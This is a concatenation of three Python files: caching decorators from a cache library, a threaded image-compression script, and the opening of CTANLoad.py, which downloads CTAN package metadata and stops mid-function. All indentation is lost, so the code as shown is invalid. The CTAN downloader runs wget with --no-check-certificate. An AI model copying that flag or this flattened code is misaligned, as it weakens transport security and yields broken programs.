:meth:`.CacheRegion.cache_on_arguments`.
:param should_cache_fn: passed to :meth:`.CacheRegion.get_or_create`.
.. versionadded:: 0.4.3
:param to_str: callable, will be called on each function argument
in order to convert to a string. Defaults to ``str()``. If the
function accepts non-ascii unicode arguments on Python 2.x, the
``unicode()`` builtin can be substituted, but note this will
produce unicode cache keys which may require key mangling before
reaching the cache.
.. versionadded:: 0.5.0
:param function_key_generator: a function that will produce a
"cache key". This function will supersede the one configured on the
:class:`.CacheRegion` itself.
.. versionadded:: 0.5.5
.. seealso::
:meth:`.CacheRegion.cache_multi_on_arguments`
:meth:`.CacheRegion.get_or_create`
"""
expiration_time_is_callable = compat.callable(expiration_time)
if function_key_generator is None:
function_key_generator = self.function_key_generator
def get_or_create_for_user_func(key_generator, user_func, *arg, **kw):
key = key_generator(*arg, **kw)
timeout = (
expiration_time()
if expiration_time_is_callable
else expiration_time
)
return self.get_or_create(
key, user_func, timeout, should_cache_fn, (arg, kw)
)
def cache_decorator(user_func):
if to_str is compat.string_type:
# backwards compatible
key_generator = function_key_generator(namespace, user_func)
else:
key_generator = function_key_generator(
namespace, user_func, to_str=to_str
)
def refresh(*arg, **kw):
"""
Like invalidate, but regenerates the value instead
"""
key = key_generator(*arg, **kw)
value = user_func(*arg, **kw)
self.set(key, value)
return value
def invalidate(*arg, **kw):
key = key_generator(*arg, **kw)
self.delete(key)
def set_(value, *arg, **kw):
key = key_generator(*arg, **kw)
self.set(key, value)
def get(*arg, **kw):
key = key_generator(*arg, **kw)
return self.get(key)
user_func.set = set_
user_func.invalidate = invalidate
user_func.get = get
user_func.refresh = refresh
user_func.original = user_func
# Use `decorate` to preserve the signature of :param:`user_func`.
return decorate(
user_func, partial(get_or_create_for_user_func, key_generator)
)
return cache_decorator
def cache_multi_on_arguments(
self,
namespace=None,
expiration_time=None,
should_cache_fn=None,
asdict=False,
to_str=compat.string_type,
function_multi_key_generator=None,
):
"""A function decorator that will cache multiple return
values from the function using a sequence of keys derived from the
function itself and the arguments passed to it.
This method is the "multiple key" analogue to the
:meth:`.CacheRegion.cache_on_arguments` method.
Example::
@someregion.cache_multi_on_arguments()
def generate_something(*keys):
return [
somedatabase.query(key)
for key in keys
]
The decorated function can be called normally. The decorator
will produce a list of cache keys using a mechanism similar to
that of :meth:`.CacheRegion.cache_on_arguments`, combining the
name of the function with the optional namespace and with the
string form of each key. It will then consult the cache using
the same mechanism as that of :meth:`.CacheRegion.get_multi`
to retrieve all current values; the originally passed keys
corresponding to those values which aren't generated or need
regeneration will be assembled into a new argument list, and
the decorated function is then called with that subset of
arguments.
The returned result is a list::
result = generate_something("key1", "key2", "key3")
The decorator internally makes use of the
:meth:`.CacheRegion.get_or_create_multi` method to access the
cache and conditionally call the function. See that
method for additional behavioral details.
Unlike the :meth:`.CacheRegion.cache_on_arguments` method,
:meth:`.CacheRegion.cache_multi_on_arguments` works only with
a single function signature, one which takes a simple list of
keys as arguments.
Like :meth:`.CacheRegion.cache_on_arguments`, the decorated function
is also provided with a ``set()`` method, which here accepts a
mapping of keys and values to set in the cache::
generate_something.set({"k1": "value1",
"k2": "value2", "k3": "value3"})
...an ``invalidate()`` method, which has the effect of deleting
the given sequence of keys using the same mechanism as that of
:meth:`.CacheRegion.delete_multi`::
generate_something.invalidate("k1", "k2", "k3")
...a ``refresh()`` method, which will call the creation
function, cache the new values, and return them::
values = generate_something.refresh("k1", "k2", "k3")
...and a ``get()`` method, which will return values
based on the given arguments::
values = generate_something.get("k1", "k2", "k3")
.. versionadded:: 0.5.3 Added ``get()`` method to decorated
function.
Parameters passed to :meth:`.CacheRegion.cache_multi_on_arguments`
have the same meaning as those passed to
:meth:`.CacheRegion.cache_on_arguments`.
:param namespace: optional string argument which will be
established as part of each cache key.
:param expiration_time: if not None, will override the normal
expiration time. May be passed as an integer or a
callable.
:param should_cache_fn: passed to
:meth:`.CacheRegion.get_or_create_multi`. This function is given a
value as returned by the creator, and only if it returns True will
that value be placed in the cache.
:param asdict: if ``True``, the decorated function should return
its result as a dictionary of keys->values, and the final result
of calling the decorated function will also be a dictionary.
If left at its default value of ``False``, the decorated function
should return its result as a list of values, and the final
result of calling the decorated function will also be a list.
When ``asdict==True`` if the dictionary returned by the decorated
function is missing keys, those keys will not be cached.
:param to_str: callable, will be called on each function argument
in order to convert to a string. Defaults to ``str()``. If the
function accepts non-ascii unicode arguments on Python 2.x, the
``unicode()`` builtin can be substituted, but note this will
produce unicode cache keys which may require key mangling before
reaching the cache.
.. versionadded:: 0.5.0
:param function_multi_key_generator: a function that will produce a
list of keys. This function will supersede the one configured on the
:class:`.CacheRegion` itself.
.. versionadded:: 0.5.5
.. seealso::
:meth:`.CacheRegion.cache_on_arguments`
:meth:`.CacheRegion.get_or_create_multi`
"""
expiration_time_is_callable = compat.callable(expiration_time)
if function_multi_key_generator is None:
function_multi_key_generator = self.function_multi_key_generator
def get_or_create_for_user_func(key_generator, user_func, *arg, **kw):
cache_keys = arg
keys = key_generator(*arg, **kw)
key_lookup = dict(zip(keys, cache_keys))
@wraps(user_func)
def creator(*keys_to_create):
return user_func(*[key_lookup[k] for k in keys_to_create])
timeout = (
expiration_time()
if expiration_time_is_callable
else expiration_time
)
if asdict:
def dict_create(*keys):
d_values = creator(*keys)
return [
d_values.get(key_lookup[k], NO_VALUE) for k in keys
]
def wrap_cache_fn(value):
if value is NO_VALUE:
return False
elif not should_cache_fn:
return True
else:
return should_cache_fn(value)
result = self.get_or_create_multi(
keys, dict_create, timeout, wrap_cache_fn
)
result = dict(
(k, v)
for k, v in zip(cache_keys, result)
if v is not NO_VALUE
)
else:
result = self.get_or_create_multi(
keys, creator, timeout, should_cache_fn
)
return result
def cache_decorator(user_func):
key_generator = function_multi_key_generator(
namespace, user_func, to_str=to_str
)
def invalidate(*arg):
keys = key_generator(*arg)
self.delete_multi(keys)
def set_(mapping):
keys = list(mapping)
gen_keys = key_generator(*keys)
self.set_multi(
dict(
(gen_key, mapping[key])
for gen_key, key in zip(gen_keys, keys)
)
)
def get(*arg):
keys = key_generator(*arg)
return self.get_multi(keys)
def refresh(*arg):
keys = key_generator(*arg)
values = user_func(*arg)
if asdict:
self.set_multi(dict(zip(keys, [values[a] for a in arg])))
return values
else:
self.set_multi(dict(zip(keys, values)))
return values
user_func.set = set_
user_func.invalidate = invalidate
user_func.refresh = refresh
user_func.get = get
# Use `decorate` to preserve the signature of :param:`user_func`.
return decorate(
user_func, partial(get_or_create_for_user_func, key_generator)
)
return cache_decorator
def make_region(*arg, **kw):
"""Instantiate a new :class:`.CacheRegion`.
Currently, :func:`.make_region` is a passthrough
to :class:`.CacheRegion`. See that class for
constructor arguments.
"""
return CacheRegion(*arg, **kw)
|
compress_images.py
|
import re
from PIL import Image
import pandas as pd
import os
import threading
from_dir = '/media/tsamsiyu/985A6DDF5A6DBAA0/Users/Dmitry/Downloads/full-frames.tar/full-frames/rtsd-frames'
to_base_dir = 'images'
meta_csv_path = 'materials/full-gt.csv'
img_name_regex = re.compile('^autosave(\d\d)_(\d\d)_(\d\d\d\d)_(.+\..+)$')
use_threads = 3
def compress(from_file_path, to_file_path):
img = Image.open(from_file_path)
img.resize((640, 480), Image.ANTIALIAS)
img.save(to_file_path, optimize=True)
def detect_file_locations(filename):
(day, month, year, new_file_name) = img_name_regex.match(filename).groups()
to_file_dir = to_base_dir + '/' + year + '/' + month + '/' + day
to_file_path = to_file_dir + '/' + new_file_name
if os.path.exists(to_file_path):
return None
if not os.path.isdir(to_file_dir):
os.makedirs(to_file_dir)
from_file_path = from_dir + '/' + filename
return from_file_path, to_file_path
def run_threads(threads):
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def main():
examples = pd.read_csv(meta_csv_path)
charged_threads = []
handled = {}
for key, row in examples.iterrows():
if row['filename'] in handled:
continue
handled[row['filename']] = True
file_locations = detect_file_locations(row['filename'])
if file_locations is not None:
t = threading.Thread(target=compress, args=file_locations)
charged_threads.append(t)
if len(charged_threads) == use_threads:
run_threads(charged_threads)
charged_threads.clear()
main()
|
CTANLoad.py
|
#!/usr/bin/python3.8
# -*- coding: utf-8 -*-
# please adjust these two lines if necessary
# CTANLoad.py
# (C) Günter Partosch, 2019/2021
# Es fehlen noch bzw. Probleme:
# - unterschiedliche Verzeichnisse für XML- und PDF-Dateien? (-)
# - GNU-wget ersetzen durch python-Konstrukt; https://pypi.org/project/python3-wget/ (geht eigentlich nicht)(-)
# - Auswahl auch nach Autor? CTAN.lap oder authorpackages; for f in authorpackages: print(authors[f][1], authorpackages[f]) (x)
# - Fehler bei -r; es wird jedesmal CTAN.pkl neu gemacht (?)
# - irgenein Fehler: crimsonpro fehlt c:\users\guent\documents\python\ctan
# ------------------------------------------------------------------
# History
#
# 2.0.0 2019-10-01 completely revised
# 2.0.1 2019-10-03 smaller changes: messages + command parsing
# 2.0.2 2019-10-04 smaller changes: messages
# 2.0.3 2019-11-26 smaller change: error message and parameter -n
# 2.0.4 2020-01-09 -c enhanced
# 2.0.5 2020-01-12 some corrections
# 2.0.6 2020-01-15 time measure
# 2.0.7 2020-01-24 statistics improved
# 2.0.8 2020-01-25 minor corrections
# 2.0.9 2020-06-05 correction in load_documentation_file
# 2.0.10 2020-06-26 enhance verbose output
# 2.0.11 2020-07-22 first lines of file
# 2.0.12 2021-04-05 output for option -c enhanced
# 2.0.13 2021-05-13 output local file name for downladed PDF files in verbose mode
# 2.0.14 2021-05-13 output the call parameters in more details in verbose mode
# 2.0.15 2021-05-14 clean-up for variables
# 2.0.16 2021-05-20 OS directory + separator improved
# 2.0.17 2021-05-21 more details in verbose mode
# 2.0.18 2021-05-23 OS directory name improved
# 2.0.19 2021-05-24 OS directory handling improved (existance, installation)
# 2.1.0 2021-05-26 load licences, make corr. directory and file; expand CTAN.pkl
# 2.1.1 2021-05-26 correction for not-existing keys in licenses.xml
# 2.1.2 2021-06-07 smaller improvements in check_integrity
# 2.2.0 2021-06-08 new approach in check_integrity
# 2.3.0 2021-06-09 some funcion calls as threads
# 2.3.1 2021-06-12 auxiliary function fold: shorten long option values for output
# 2.3.2 2021-06-14 messages classified: Warnings, Error, Info
# 2.3.3 2021-06-14 str.format(...) used (if applicable); ellipses used to shorten some texts
# 2.3.4 2021-06-15 main function new structured
# 2.3.5 2021-06-18 output (options in program call) enhanced
# 2.3.6 2021-06-18 new function verify_PDF_files: check actualized PDF_toc; delete a PDF file if necessary
# 2.3.7 2021-06-19 main function more modularized; new functions call_plain, call_load, call_check
# 2.3.8 2021-06-22 error corrections and improvements for the handling von PDF_toc and XML_toc
# 2.4.0 2021-06-23 regeneration of pickle file enabled: new option -r; new functions regenerate_pickle_files and get_XML_files
# 2.4.1 2021-06-24 error handling in the check_integrity context changed
# 2.4.2 2021-06-26 handling of -r changed
# 2.5.0 2021-06-30 add. option -k; add. function get_CTAN_lpt (needs CTAN.lpt)
# 2.5.1 2021-07-01 minor corrections
# 2.5.2 2021-07-05 function fold restructured
# 2.5.3 2021-07-06 pickle file 1 is generated, too
# 2.6.0 2021-07-11 search of packages with author name template; new option -A; new function get_CTAN_lap (needs CTAN.lap)
# 2.6.1 2021-07-12 some corrections in the handling of -t / -k and -A
# 2.6.2 2021-07-15 more corrections in the handling of -t / -k and -A
# 2.7.0 2021-07-26 combined filtering new organized; new function get_package_set; 2 additional warning messages
# ------------------------------------------------------------------
# Usage (CTANLoad)
#
# usage: CTANLoad.py [-h] [-a] [-A AUTHOR_TEMPLATE] [-c] [-d DIREC] [-f] [-l]
# [-k KEY_TEMPLATE] [-n NUMBER] [-o OUTPUT_NAME] [-r]
# [-t TEMPLATE] [-stat] [-v] [-V]
#
# Load XLM and PDF documentation files from CTAN a/o generate some special
# lists, and prepare data for CTANOut [CTANLoad.py; Version: 2.7.0 (2021-07-26)]
#
# Optional parameters:
# -h, --help show this help message and exit
# -a, --author Author of the program
# -A AUTHOR_TEMPLATE, --author_template AUTHOR_TEMPLATE
# Name template for authors - Default:
# -c, --check_integrity
# Flag: Check the integrity of the 2nd .pkl file. -
# Default: False
# -d DIREC, --directory DIREC
# OS Directory for output files - Default: .\
# -f, --download_files Flag: Download associated documentation files [PDF]. -
# Default: False
# -l, --lists Flag: Generate some special lists and prepare files
# for CTANOut. - Default: False
# -k KEY_TEMPLATE, --key_template KEY_TEMPLATE
# Key template for package XML files to be loaded -
# Default:
# -n NUMBER, --number NUMBER
# Maximum number of file downloads - Default: 250
# -o OUTPUT_NAME, --output OUTPUT_NAME
# Generic file name for output files - Default: all
# -r, --regenerate_pickle_files
# Flag: Regenerate the two pickle files. - Default:
# False
# -t TEMPLATE, --template TEMPLATE
# Name template for package XML files to be loaded -
# Default:
# -stat, --statistics Flag: Print statistics. - Default: False
# -v, --verbose Flag: Output is verbose. - Default: False
# -V, --version Version of the program
#
# ------------------------------------------------------------------
# Messages (CTANLoad)
#
# Informative messages:
# - Info: PDF documentation file '<PDF file>' downloaded
# - Info: Regeneration of '<pickle file>'
# - Info: Successfully created the OS directory '<directory>'
# - Info: XML file '<XML file>' downloaded ('<local file>.xml' on PC)
# - Info: XML file for package '<package name>' downloaded ('<local file>.xml' on PC)
# - Info: authors collected
# - Info: entry '<entry>' in OS directory deleted
# - Info: file '<file name>' (list of authors and associated packages) generated
# - Info: file '<file name>' (list of authors) generated
# - Info: file '<file name>' (list of licenses) generated
# - Info: file '<file name>' (list of packages) generated
# - Info: file '<file name>' (list of topics and associated packages) generated
# - Info: file '<file name>' (list of topics) generated
# - Info: integrity check
# - Info: licenses collected
# - Info: local XML file '<XML file'
# - Info: no error with integrity check
# - Info: packages collected
# - Info: packagetopics, topicspackage, authorpackage collected
# - Info: pickle file '<pickle file name>' written
# - Info: program successfully completed
# - Info: topics collected
# - Info: unique local file name: '<local file name>'
#
# Warnings:
# - Warning: Creation of the OS directory '<directory>' failed
# - Warning: PDF documentation file '<PDF file>' not downloaded
# - Warning: PDF file '<PDF file> in OS deleted
# - Warning: PDF file '<XML file>' without associated XML file
# - Warning: XML file '<XML file>' empty or not well-formed
# - Warning: XML file '<XML file>' in OS deleted
# - Warning: XML file for package '<package name>' not downloaded
# - Warning: entry '<entry>' in dictionary, but OS file is empty
# - Warning: entry '<entry>' in dictionary, but OS file not found
# - Warning: local XML file for package '<package name>' empty or not well-formed
# - Warning: local XML file for package '<package name>' not found
# - Warning: maximum number (<number>) of downloaded XML+PDF files exceeded
# - Warning: no correct XML file for any specified package found
# - Warning: no package found which matched the specified <kind of template> template '<template>'
# - Warning: pickle file '<pickle file name>' cannot be loaded a/o written
# - Warnung: '<option>' reset to {new value} (due to <reason>)"
#
# Errors:
# - Error: programm terminated
# - Error: standard XML file 'file' empty or not well-formed
# - Error: standard XML file '<XML file>' not downloaded
# - Error: tried to use the program indirectly
# - Error: local file '<file>' not loaded
# ------------------------------------------------------------------
# Functions in CTANLoad.py
#
# analyze_XML_file(file) Analyze a XML package file for documentation (PDF) files.
# call_check() Process all necessary steps for a integrity check.
# call_load() Process all steps for a complete ctanout call (without integrity check).
# call_plain() Process all steps for a plain call.
# check_integrity() Check integrity.
# fold() auxiliary function
# generate_lists() Generate xyz.loa (list of authors), xyz.lop (list of packages), xyz.lok (list of topics),
# xyz.lpt (list of topics and associated packages), xyz.lap (list of authors and associated packages), xyz is the specified generic output file name.
# generate_pickle1() pickle dump: actual authors, packages, licenses, topics, topicspackage, packagetopics
# generate_pickle2() pickle dump: actual XML_toc (list with download information files).
# generate_topicspackage() Generate topicspackage, packagetopics, and authorpackages.
# get_CTAN_lpt() Load CTAN.lpt and analyze; get cross-reference of topics and packages
# get_CTAN_lap() Load CTAN.lap and analyze; get cross-reference of authors and packages
# get_package_set() Analyze dictionary 'packages' for name templates
# get_PDF_files(d) List all PDF files in a OS directory.
# get_XML_files(d) List all XML files in the OS directory d.
# dload_XML_files() Download XML package files.
# load_XML_toc() Load pickle file 2 (with XML_toc).
# dload_authors() Download XML file 'authors'.
# dload_document_file(...) Download one information file (PDF).
# dload_licenses() Download XML file 'licenses'.
# dload_packages() Download XML file 'packages'.
# dload_topics() Download XML file 'topics'.
# main() Main function
# make_statistics() Print statistics on terminal.
# regenerate_pickle_files() Regenerate corrupted pickle files.
# set_PDF_toc() Fill PDF_toc on the basis of XML_Toc.
# ------------------------------------------------------------------
# Examples (CTANLoad)
# CTANLoad -h
# - help, show the options
#
# CTANLoad
# - download authors, topics, packages, licenses; write CTAN.pkl
# - not verbose and without statistics
#
# CTANLoad -v -stat
# - as above
# - verbose [-v]
# - with statistics [-stat]
#
# CTANLoad -t "^a.+$" -v
# - load all CTAN XML files with name template "^a.+$" [-t]
# - verbose output [-v]
#
# CTANLoad -f -n 300 -t "^l3" -v
# - verbose output [-v]
# - load all CTAN XML files with the name template "^l3$" [-t]
# - load the associated information files (PDF) [-f]
# - maximum number of download files [-n]
#
# CTANLoad -v -l
# - generate some special lists, and prepare files for CTANOut [-l]
# - verbose output [-v]
#
# CTANLoad -v -l -c -stat
# - generate some special lists, and prepare files for CTANOut [-l]
# - verbose output [-v]
# - with integrity check [-c]
# - with statistics [-stat]
#
# CTANLoad -v -stat -r
# - Regenerate the two pickle files [-r]
# - with integrity check [-c]
# - with statistics [-stat]
#
# CTANLoad -k latex -f -v -stat
# - download all CTAN packages which match the topic "latex" [-k]
# - load the associated information files (PDF) [-f]
# - verbose [-v]
# - with statistics [-stat]
#
# CTANLoad -k chinese -t "^zh" -f -v -stat
# - download all CTAN packages which match the topic "chinese" [-k]
# - download only CTAN XML files with the name template "^zh" [-t]
# - load the associated information files (PDF) [-f]
# - verbose [-v]
# - with statistics [-stat]
#
# CTANLoad -A Knuth -v -stat
# - download all XML packages with the author template "Knuth" [-A]
# - verbose [-v]
# - with statistics [-stat]
#
# CTANLoad -A Knuth -k collection -stat
# - download all XML packages with the author template "Knuth" [-A]
# - download only packages with the topic template "collection"[-k]
# - verbose [-v]
# - with statistics [-stat]
#
# CTANLoad -A Knuth -k collection -f -v -stat -t knuth
# - download all XML packages with the author template "Knuth" [-A]
# - download only packages with the topic template "collection"[-k]
# - download only packages with the name template "knuth" [-t]
# - verbose [-v]
# - with statistics [-stat]
# Regular expressions
# -------------------
# The options -t (a/o -to and -tl) and -k (a/o -ko and -kl) need regular expressions as values.
# such as
#
# -k latex matches all topic names which contain "latex"
# -t "latex|ltx|l3|lt3" matches all file names which contain "latex", "ltx", "l3|" or "t3"
# -t "^.+$" matches all file names
# -t "^{a-b]" matches all file names which begin with letters a-b
# ==================================================================
# Imports
import argparse # parse arguments
import os # delete a file on disk, for instance
from os import path # path informations
import pickle # read/write pickle data
import platform # get OS informations
import random # used for random integers
import re # handle regular expressions
import subprocess # handling of sub-processes
import sys # system calls
import time # used for random seed, time measurement
import xml.etree.ElementTree as ET # XML processing
from threading import Thread # handling of threads
# ==================================================================
# Global settings
# ------------------------------------------------------------------
# The program
prg_name = "CTANLoad.py"
prg_author = "Günter Partosch"
prg_email = "Guenter.Partosch@hrz.uni-giessen,de"
prg_version = "2.7.0"
prg_date = "2021-07-26"
prg_inst = "Justus-Liebig-Universität Gießen, Hochschulrechenzentrum"
operatingsys = platform.system()
call = sys.argv
# ------------------------------------------------------------------
# Texts for argparse and help
author_text = "Author of the program"
author_template_text = "Name template for authors"
version_text = "Version of the program"
template_text = "Name template for package XML files to be loaded"
key_template_text = "Key template for package XML files to be loaded"
output_text = "Generic file name for output files"
number_text = "Maximum number of file downloads"
direc_text = "OS Directory for output files"
program_text = "Load XLM and PDF documentation files from CTAN a/o generate some special lists, and prepare data for CTANOut"
verbose_text = "Flag: Output is verbose."
download_text = "Flag: Download associated documentation files [PDF]."
lists_text = "Flag: Generate some special lists and prepare files for CTANOut."
statistics_text = "Flag: Print statistics."
integrity_text = "Flag: Check the integrity of the 2nd .pkl file."
regenerate_text = "Flag: Regenerate the two pickle files."
# -----------------------------------------------------------------
# Defaults/variables for argparse
download_default = False # default for option -f (no PDF download)
integrity_default = False # default for option -c (no integrity check)
lists_default = False # default for option -n (special lists are not generated)
number_default = 250 # default for option -n (maximum number of files to be loaded)
output_name_default = "all" # default for option -o (generic file name)
statistics_default = False # default for option -stat (no statistics output)
template_default = "" # default for option -t (name template for file loading)
author_template_default = "" # default for option -A (author name template)
key_template_default = "" # default for option -k (key template for file loading)
verbose_default = False # default for option -n (output is not verbose)
regenerate_default = False # default for option -r (no regeneration)
act_direc = "."
if operatingsys == "Windows":
direc_sep = "\\"
else:
direc_sep = "/"
direc_default = act_direc + direc_sep # default for -d (output OS directory)
download = None # option -f (no PDF download)
integrity = None # option -c (no integrity check)
lists = None # option -n (special lists are not generated)
number = 0 # option -n (maximum number of files to be loaded)
output_name = "" # option -o (generic file name)
statistics = None # option -stat (no statistics output)
template = "" # option -t (name template for file loading)
author_template = "" # option -A (author name tzemplate)
key_template = "" # option -k (key template)
verbose = None # option -n (output is not verbose)
# ------------------------------------------------------------------
# Dictionaries
authorpackages = {} # python dictionary: list of authors and their packages
authors = {} # python dictionary: list of authors
packages = {} # python dictionary: list of packages
licenses = {} # python dictionary: list of licenses
packagetopics = {} # python dictionary: list of packages and their topics
topics = {} # python dictionary: list of topics
topicspackage = {} # python dictionary: list of topics and their packages
XML_toc = {} # python dictionary: list of PDF files: XML_toc[href]=...PDF file
PDF_toc = {} # python dictionary: list of PDF files: PDF_toc[lfn]=...package file
all_XML_files = () # list with all XML files
selected_packages_lpt = set() # python dictionary: list of packages with selected topics
selected_packages_lap = set() # python dictionary: list of packages with selected authors
# XML_toc
# Structure: XML_toc[href] = (XML file, key, onename)
# generated and changed in: analyze_XML_file(file), check_integrity()
# inspected in: analyze_XML_file(file), check_integrity()
# stored in pickle file: generate_pickle2()
# loaded from pickle file: load_XML_toc()
#
# PDF_toc
# Structure: PDF_toc[fkey + "-" + onename] = file
# generated in: get_PDF_files(d)
# changed in analyze_XML_file(file), check_integrity()
# inspected in: check_integrity()
# 1st pickle file:
# name: CTAN.pkl
# contains: authors, packages, topics, licenses, topicspackage, packagetopics, authorpackages
#
# 2nd pickle file:
# name: CTAN2.pkl
# contains: XML_toc
# ------------------------------------------------------------------
# Settings for wget (authors, packages, topics)
ctanUrl = "https://ctan.org" # head of a CTAN url
ctanUrl2 = ctanUrl + "/tex-archive" # head of another CTAN url
call1 = "wget https://ctan.org/xml/2.0/" # base wget call for authors, packages, ...
call2 = "wget https://ctan.org/xml/2.0/pkg/" # base wget call for package files
parameter = "?no-dtd=true --no-check-certificate -O " # additional parameter for wget
# ------------------------------------------------------------------
# other settings
pkl_file = "CTAN.pkl" # name of 1st pickle file
pkl_file2 = "CTAN2.pkl"# name of 2nd pickle file
counter = 0 # counter for downloaded XML files (in the actual session)
pdfcounter = 0 # counter for downloaded PDF files (in the actual session)
pdfctrerr = 0 # counter for not downloaded PDF files (in the actual session)
corrected = 0 # counter of corrected entries in XML_toc (in the actual session)
ext = ".xml" # file name extension for downloaded XML files
rndg = 2 # optional rounding of float numbers
left = 35 # width of labels in statistics
ellipse = " ..." # abbreviate texts
ok = None
reset_text = "Info: '{0}' reset to {1} (due to {2})"
exclusion = ["authors.xml", "topics.xml", "packages.xml", "licenses.xml"]
random.seed(time.time()) # seed for random number generation
# ==================================================================
# argparse
# parses options and processes them
parser = argparse.ArgumentParser(description = program_text + " [" + prg_name + "; " +
"Version: " + prg_version + " (" + prg_date + ")]")
parser._positionals.title = 'Positional parameters'
parser._optionals.title = 'Optional parameters'
parser.add_argument("-a", "--author", # Parameter -a/--author
help = author_text,
action = 'version',
version = prg_author + " (" + prg_email + ", " + prg_inst + ")")
parser.add_argument("-A", "--author_template", # Parameter -A/--author_template
help = author_template_text + " - Default: " + "%(default)s",
dest = "author_template",
default = author_template_default)
parser.add_argument("-c", "--check_integrity", # Parameter -c/--check_integrity
help = integrity_text + " - Default: " + "%(default)s",
## help = argparse.SUPPRESS,
action = "store_true",
default = integrity_default)
parser.add_argument("-d", "--directory", # Parameter -d/--directory
help = direc_text + " - Default: " + "%(default)s",
dest = "direc",
default = direc_default)
parser.add_argument("-f", "--download_files", # Parameter -f/--download_files
help = download_text + " - Default: " + "%(default)s",
action = "store_true",
default = download_default)
parser.add_argument("-l", "--lists", # Parameter -l/--lists
help = lists_text + " - Default: " + "%(default)s",
action = "store_true",
default = lists_default)
parser.add_argument("-k", "--key_template", # Parameter -k/--key_template
help = key_template_text + " - Default: " + "%(default)s",
dest = "key_template",
default = key_template_default)
parser.add_argument("-n", "--number", # Parameter -n/--number
help = number_text + " - Default: " + "%(default)s",
dest = "number",
default = number_default)
parser.add_argument("-o", "--output", # Parameter -o/--output
help = output_text + " - Default: " + "%(default)s",
dest = "output_name",
default = output_name_default)
parser.add_argument("-r", "--regenerate_pickle_files", # Parameter -r/--regenerate_pickle_files
help = regenerate_text + " - Default: " + "%(default)s",
action = "store_true",
default = regenerate_default)
parser.add_argument("-t", "--template", # Parameter -t/--template
help = template_text + " - Default: " + "%(default)s",
dest = "template",
default = template_default)
parser.add_argument("-stat", "--statistics", # Parameter -stat/--statistics
help = statistics_text + " - Default: " + "%(default)s",
action = "store_true",
default = statistics_default)
parser.add_argument("-v", "--verbose", # Parameter -v/--verbose
help = verbose_text + " - Default: " + "%(default)s",
action = "store_true",
default = verbose_default)
parser.add_argument("-V", "--version", # Parameter -V/--version
help = version_text,
action = 'version',
version = '%(prog)s ' + prg_version + " (" + prg_date + ")")
# ------------------------------------------------------------------
# Getting parsed values
args = parser.parse_args() # all parameters of programm call
author_template = args.author_template # parameter -A
direc = args.direc # parameter -d
download = args.download_files # parameter -f
integrity = args.check_integrity # parameter -c
key_template = args.key_template # parameter -k
lists = args.lists # parameter -l
number = int(args.number) # parameter -n
regenerate = args.regenerate_pickle_files # parameter -r
statistics = args.statistics # Parameter -stat
template = args.template # parameter -k
verbose = args.verbose # parameter -v
# ------------------------------------------------------------------
# Correct OS directory name, test OS directory existence, and install OS directory
direc = direc.strip() # correct OS directory name (-d)
if direc[len(direc) - 1] != direc_sep:
direc += direc_sep
if not path.exists(direc):
try:
os.mkdir(direc)
except OSError:
print ("- Warning: Creation of the directory '{0}' failed".format(direc))
else:
print ("- Info: Successfully created the directory '{0}' ".format(direc))
output_name = direc + args.output_name # parameter -d
# ------------------------------------------------------------------
# additional files, if you want to search topics a/a authors and their corr. packages
topicpackage_file = direc + "CTAN.lpt" # name of a additional xyz.lpt file
authorpackage_file = direc + "CTAN.lap" # name of a additional xyz.lap file
# ------------------------------------------------------------------
# regular expressions
p2 = re.compile(template) # regular expression based on parameter -t
p3 = re.compile("^[0-9]{10}-.+[.]pdf$") # regular expression for local PDF file names
p4 = re.compile("^.+[.]xml$") # regular expression for local XML file names
p5 = re.compile(key_template) # regular expression for topics
p6 = re.compile(author_template) # regular expression for authors
#===================================================================
# Auxiliary function
def fold(s): # function fold: auxiliary function: shorten long option values for output
"""auxiliary function: shorten long option values for output"""
offset = 64 * " "
maxlen = 70
sep = "|" # separator for split
parts = s.split(sep) # split s on sep
line = ""
out = ""
for f in range(0, len(parts)):
if f != len(parts) - 1:
line = line + parts[f] + sep
else:
line = line + parts[f]
if len(line) >= maxlen:
out = out +line+ "\n" + offset
line = ""
out = out + line
return out
# ==================================================================
# Functions for main part
# ------------------------------------------------------------------
def analyze_XML_file(file): # Function analyze_XML_file(file): Analyze a XML package file for documentation (PDF) files.
"""Analyze a XML package file for documentation (PDF) files."""
# analyze_XML_file --> dload_document_file
global XML_toc # global Pythondirectory
global PDF_toc # global Pythondirectory for PDF files
error = False
try: # try to open and parse a XML file
f = open(file, encoding="utf-8", mode="r") # open the XML file
onePackage = ET.parse(f) # parse the XML file
onePackageRoot = onePackage.getroot() # get root
except: # parsing not successfull
if verbose:
print("------- Warning: local XML file for package '{0}' empty or not well-formed".format(file))
error = True
if not error:
ll = list(onePackageRoot.iter("documentation")) # all documentation elements == all documentation childs
for g in ll: # loop: all documentation childs
href = g.get("href", "") # href attribute
if ".pdf" in href: # there is ".pdf" in the string
fnames = re.split("/", href) # split this string at "/"
href2 = href.replace("ctan:/", ctanUrl2) # construct the correct URL
if href in XML_toc: # href allready used?
(tmp, fkey, onename) = XML_toc[href] # get the components
else: # href not allready used?
onename = fnames[len(fnames) - 1] # get the file name
fkey = str(random.randint(1000000000, 9999999999)) # construct a random file name
XML_toc[href] = (file, fkey, onename) # store this new file name
if download:
if dload_document_file(href2, fkey, onename): # load the PDF document
PDF_toc[fkey + "-" + onename] = file
f.close() # close the analyzed XML file
# ------------------------------------------------------------------
def call_check(): # Function call_check: Process all necessary steps for a integrity check.
"""Process all necessary steps for a integrity check."""
# call_check --> get_PDF_files
# call_check --> dload_topics
# call_check --> dload_authors
# call_check --> dload_licenses
# call_check --> dload_packages
# call_check --> generate_topicspackage
# call_check --> generate_pickle1
# call_check --> generate_lists
# call_check --> check_integrity
global PDF_toc
global XML_toc
global authors
global licenses
global packages
global topics
global topicspackage, packagetopics, number, counter, pdfcounter
get_PDF_files(direc)
dload_topics() # load the file topics.xml
dload_authors() # load the file authors.xml
dload_licenses() # load the file licenses.xml
dload_packages() # load the file packages.xml
generate_topicspackage() # generates topicspackage, ...
thr3 = Thread(target=generate_pickle1) # dumps authors, packages, topics, licenses, topicspackage, packagetopics
thr3.start()
thr3.join()
if lists: # if lists are to be generated
generate_lists() # generate x.loa, x.lop, x.lok, x.lol, x.lpt, x.lap
if integrity: # if the integrity is to be checked
check_integrity() # when indicated: remove files or entries
# ------------------------------------------------------------------
def call_load(): # Function call_load: Process all steps for a complete ctanout call (without integrity check).
"""Process all steps for a complete ctanout call (withoutb integrity check)."""
# call_load --> get_PDF_files
# call_load --> dload_topics
# call_load --> dload_authors
# call_load --> dload_licenses
# call_load --> dload_packages
# call_load --> load_XML_toc
